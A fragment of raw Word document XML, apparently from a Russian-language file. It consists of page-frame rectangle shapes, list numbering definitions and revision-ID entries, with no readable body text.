                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6588000" cy="101880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87277" id="Прямоугольник 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:58.1pt;margin-top:18.45pt;width:518.75pt;height:802.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" filled="f" strokecolor="black [3213]" strokeweight="2.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3624" w14:textId="77777777" w:rsidR="002519A3" w:rsidRDefault="002519A3">
    <w:pPr>
      <w:pStyle w:val="a3"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:eastAsia="ru-RU"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0462E7C9" wp14:editId="550A2A3C">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>737870</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>234315</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6588000" cy="10188000"/>
              <wp:effectExtent l="19050" t="19050" r="22860" b="22860"/>
              <wp:wrapNone/>
              <wp:docPr id="5" name="Прямоугольник 5"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6588000" cy="101880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DF65D" id="Прямоугольник 5" o:spid="_x0000_s1026" style="position:absolute;margin-left:58.1pt;margin-top:18.45pt;width:518.75pt;height:802.2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" filled="f" strokecolor="black [3213]" strokeweight="2.25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B64C" w14:textId="77777777" w:rsidR="004654AE" w:rsidRDefault="004654AE">
    <w:pPr>
      <w:pStyle w:val="a3"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:eastAsia="ru-RU"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0CFB6E09" wp14:editId="4AD900F3">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>737870</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>234315</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6588000" cy="10188000"/>
              <wp:effectExtent l="19050" t="19050" r="22860" b="22860"/>
              <wp:wrapNone/>
              <wp:docPr id="3" name="Прямоугольник 3"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6588000" cy="101880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3FA54" id="Прямоугольник 3" o:spid="_x0000_s1026" style="position:absolute;margin-left:58.1pt;margin-top:18.45pt;width:518.75pt;height:802.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" filled="f" strokecolor="black [3213]" strokeweight="2.25pt">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9A53D" w14:textId="5AE91496" w:rsidR="004654AE" w:rsidRDefault="004654AE">
    <w:pPr>
      <w:pStyle w:val="a3"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:eastAsia="ru-RU"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3AC7A6CB" wp14:editId="02031212">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>737870</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>234315</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6588000" cy="10188000"/>
              <wp:effectExtent l="19050" t="19050" r="22860" b="22860"/>
              <wp:wrapNone/>
              <wp:docPr id="4" name="Прямоугольник 4"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6588000" cy="101880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E63A7" id="Прямоугольник 4" o:spid="_x0000_s1026" style="position:absolute;margin-left:58.1pt;margin-top:18.45pt;width:518.75pt;height:802.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" filled="f" strokecolor="black [3213]" strokeweight="2.25pt">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C34F6" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRDefault="00FA5930">
    <w:pPr>
      <w:pStyle w:val="a3"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:eastAsia="ru-RU"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="54C88EC4" wp14:editId="02063DE7">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>737870</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>234315</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6588000" cy="10188000"/>
              <wp:effectExtent l="19050" t="19050" r="22860" b="22860"/>
              <wp:wrapNone/>
              <wp:docPr id="9" name="Прямоугольник 9"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6588000" cy="101880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B288E4" id="Прямоугольник 9" o:spid="_x0000_s1026" style="position:absolute;margin-left:58.1pt;margin-top:18.45pt;width:518.75pt;height:802.2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" filled="f" strokecolor="black [3213]" strokeweight="2.25pt">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9D1A" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRDefault="00FA5930">
    <w:pPr>
      <w:pStyle w:val="a3"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:eastAsia="ru-RU"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6EADE3EE" wp14:editId="200E1A79">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>720090</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>180340</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6624000" cy="10332000"/>
              <wp:effectExtent l="0" t="0" r="24765" b="12700"/>
              <wp:wrapNone/>
              <wp:docPr id="6" name="Прямоугольник 6"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6624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39480D" id="Прямоугольник 6" o:spid="_x0000_s1026" style="position:absolute;margin-left:56.7pt;margin-top:14.2pt;width:521.55pt;height:813.5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385E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="55D8C0C4"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1724"/>
        </w:tabs>
        <w:ind w:left="1724" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2444"/>
        </w:tabs>
        <w:ind w:left="2444" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3164"/>
        </w:tabs>
        <w:ind w:left="3164" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3884"/>
        </w:tabs>
        <w:ind w:left="3884" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4604"/>
        </w:tabs>
        <w:ind w:left="4604" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5324"/>
        </w:tabs>
        <w:ind w:left="5324" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6044"/>
        </w:tabs>
        <w:ind w:left="6044" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6764"/>
        </w:tabs>
        <w:ind w:left="6764" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="05094E95"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A670955E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="450" w:hanging="450"/>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0A5513C8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="30AA4798"/>
    <w:lvl w:ilvl="0" w:tplc="6DF6F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F670ED3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BD0040D4"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1353" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="3"/>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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="12057711"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3856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9E59B2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F58E051E"/>
    <w:lvl w:ilvl="0" w:tplc="D410F890">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1429" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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5E0A9B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8BA85538"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>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F267196"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C30E71DA"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="375" w:hanging="375"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="3"/>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3157031E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="74CC2C16"/>
    <w:lvl w:ilvl="0" w:tplc="FF90CBF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3103B96"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="590A39EA"/>
    <w:lvl w:ilvl="0" w:tplc="4704C3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681242D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D00E3554"/>
    <w:lvl w:ilvl="0" w:tplc="68C4BC46">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1429" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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DBB015F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2006017A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts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4D1A31F8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A16EE42"/>
    <w:lvl w:ilvl="0" w:tplc="D4E25C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FC6325F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="58C6FDE8"/>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52097CC9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B36249D8"/>
    <w:lvl w:ilvl="0" w:tplc="4888EC66">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57AE03D1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8444937E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1069" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1430" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2869" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3949" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4669" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5749" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6829" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7549" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8629" w:hanging="2160"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="58713CAE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B0E014D8"/>
    <w:lvl w:ilvl="0" w:tplc="6966EF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58770A8D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EC122BCC"/>
    <w:lvl w:ilvl="0" w:tplc="AB48777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00160AC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="426E07B4"/>
    <w:lvl w:ilvl="0" w:tplc="8DFC5E9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A2A12CF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BF48E92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7300051A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1FDEE1D2"/>
    <w:lvl w:ilvl="0" w:tplc="D602C9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73A8495E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7236197E"/>
    <w:lvl w:ilvl="0" w:tplc="9BB028A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2138" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="AB48777A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="‒"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2858" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"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22" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="77787B70"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4A1C635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794B7C16"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66B49D38"/>
    <w:lvl w:ilvl="0" w:tplc="6DF6F1E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F912127"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C3D42F92"/>
    <w:lvl w:ilvl="0" w:tplc="07EAF3B4">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num w:numId="1" w16cid:durableId="304967873">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="437988702">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="34043473">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1032610833">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1538398202">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1352297118">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1632633855">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1423574373">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1051033492">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="551575164">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1122268431">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1269464304">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="2061711848">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1261569256">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="785779880">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="146630756">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="756639367">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="667170064">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1509758407">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="669909002">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1045955813">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="788400384">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1530990611">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="190261060">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="20123694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538"/>
    <w:rsid w:val="000001E1"/>
    <w:rsid w:val="00020165"/>
    <w:rsid w:val="00030E4A"/>
    <w:rsid w:val="00032A9A"/>
    <w:rsid w:val="000358B3"/>
    <w:rsid w:val="00045A6B"/>
    <w:rsid w:val="000502FD"/>
    <w:rsid w:val="00063698"/>
    <w:rsid w:val="000902B7"/>
    <w:rsid w:val="000A1CD6"/>
    <w:rsid w:val="000B2212"/>
    <w:rsid w:val="000C2219"/>
    <w:rsid w:val="000C52A4"/>
    <w:rsid w:val="000E29DB"/>
    <w:rsid w:val="000F3CF9"/>
    <w:rsid w:val="000F6B2D"/>
    <w:rsid w:val="00106F01"/>
    <w:rsid w:val="00112156"/>
    <w:rsid w:val="00117A60"/>
    <w:rsid w:val="00120F34"/>
    <w:rsid w:val="0012469A"/>
    <w:rsid w:val="00131476"/>
    <w:rsid w:val="00131487"/>
    <w:rsid w:val="0013380E"/>
    <w:rsid w:val="0013460A"/>
    <w:rsid w:val="00142BF2"/>
    <w:rsid w:val="001559AD"/>
    <w:rsid w:val="00161F54"/>
    <w:rsid w:val="0017764F"/>
    <w:rsid w:val="001778D4"/>
    <w:rsid w:val="00181ECB"/>
    <w:rsid w:val="00191A78"/>
    <w:rsid w:val="0019648D"/>
    <w:rsid w:val="001A0EFD"/>
    <w:rsid w:val="001F52A0"/>
    <w:rsid w:val="001F68DE"/>
    <w:rsid w:val="00211292"/>
    <w:rsid w:val="00212505"/>
    <w:rsid w:val="00215392"/>
    <w:rsid w:val="00230C61"/>
    <w:rsid w:val="00245CF1"/>
    <w:rsid w:val="002519A3"/>
    <w:rsid w:val="002674A5"/>
    <w:rsid w:val="00284C1B"/>
    <w:rsid w:val="00284C72"/>
    <w:rsid w:val="002A0DB3"/>
    <w:rsid w:val="002A245A"/>
    <w:rsid w:val="002B155F"/>
    <w:rsid w:val="002B5F81"/>
    <w:rsid w:val="002E66B7"/>
    <w:rsid w:val="002E6B39"/>
    <w:rsid w:val="002F7745"/>
    <w:rsid w:val="00301C2C"/>
    <w:rsid w:val="00305EE7"/>
    <w:rsid w:val="00316AE9"/>
    <w:rsid w:val="003210E3"/>
    <w:rsid w:val="003320E1"/>
    <w:rsid w:val="00333470"/>
    <w:rsid w:val="00335F70"/>
    <w:rsid w:val="00351289"/>
    <w:rsid w:val="00352169"/>
    <w:rsid w:val="00357C00"/>
    <w:rsid w:val="003617AD"/>
    <w:rsid w:val="00361A27"/>
    <w:rsid w:val="00364155"/>
    <w:rsid w:val="00366FD0"/>
    <w:rsid w:val="003770F2"/>
    <w:rsid w:val="0038038E"/>
    <w:rsid w:val="00383265"/>
    <w:rsid w:val="003A0E58"/>
    <w:rsid w:val="003C0349"/>
    <w:rsid w:val="003E0206"/>
    <w:rsid w:val="003F270B"/>
    <w:rsid w:val="003F4C7A"/>
    <w:rsid w:val="00402025"/>
    <w:rsid w:val="004120EE"/>
    <w:rsid w:val="004158EE"/>
    <w:rsid w:val="00420EB4"/>
    <w:rsid w:val="00436D60"/>
    <w:rsid w:val="00442512"/>
    <w:rsid w:val="00444D35"/>
    <w:rsid w:val="0044733B"/>
    <w:rsid w:val="00452A2E"/>
    <w:rsid w:val="00460D91"/>
    <w:rsid w:val="00461639"/>
    <w:rsid w:val="004654AE"/>
    <w:rsid w:val="00466012"/>
    <w:rsid w:val="00467F9C"/>
    <w:rsid w:val="00487796"/>
    <w:rsid w:val="0049445C"/>
    <w:rsid w:val="004961D0"/>
    <w:rsid w:val="004B538F"/>
    <w:rsid w:val="004C410D"/>
    <w:rsid w:val="00500EE5"/>
    <w:rsid w:val="00512D96"/>
    <w:rsid w:val="0051552D"/>
    <w:rsid w:val="005222DD"/>
    <w:rsid w:val="0052745D"/>
    <w:rsid w:val="00530E6E"/>
    <w:rsid w:val="0054172F"/>
    <w:rsid w:val="00543A2F"/>
    <w:rsid w:val="00547457"/>
    <w:rsid w:val="005541FA"/>
    <w:rsid w:val="0056080C"/>
    <w:rsid w:val="0056519B"/>
    <w:rsid w:val="00567BF8"/>
    <w:rsid w:val="00571EB2"/>
    <w:rsid w:val="00593F1D"/>
    <w:rsid w:val="005A092C"/>
    <w:rsid w:val="005A1278"/>
    <w:rsid w:val="005A1423"/>
    <w:rsid w:val="005C2377"/>
    <w:rsid w:val="005C34B9"/>
    <w:rsid w:val="005C39E4"/>
    <w:rsid w:val="005C3F3C"/>
    <w:rsid w:val="005C5EA8"/>
    <w:rsid w:val="005D6C1B"/>
    <w:rsid w:val="005D6D27"/>
    <w:rsid w:val="005E15AF"/>
    <w:rsid w:val="005E7CF1"/>
    <w:rsid w:val="005F5F0E"/>
    <w:rsid w:val="005F6CB3"/>
    <w:rsid w:val="006037FD"/>
    <w:rsid w:val="0064344F"/>
    <w:rsid w:val="00656E78"/>
    <w:rsid w:val="006605C1"/>
    <w:rsid w:val="006A39E1"/>
    <w:rsid w:val="006B65DA"/>
    <w:rsid w:val="006C449C"/>
    <w:rsid w:val="006D0511"/>
    <w:rsid w:val="006D0601"/>
    <w:rsid w:val="006E26C2"/>
    <w:rsid w:val="006E752C"/>
    <w:rsid w:val="006F247E"/>
    <w:rsid w:val="006F74AE"/>
    <w:rsid w:val="00702DD3"/>
    <w:rsid w:val="007444AC"/>
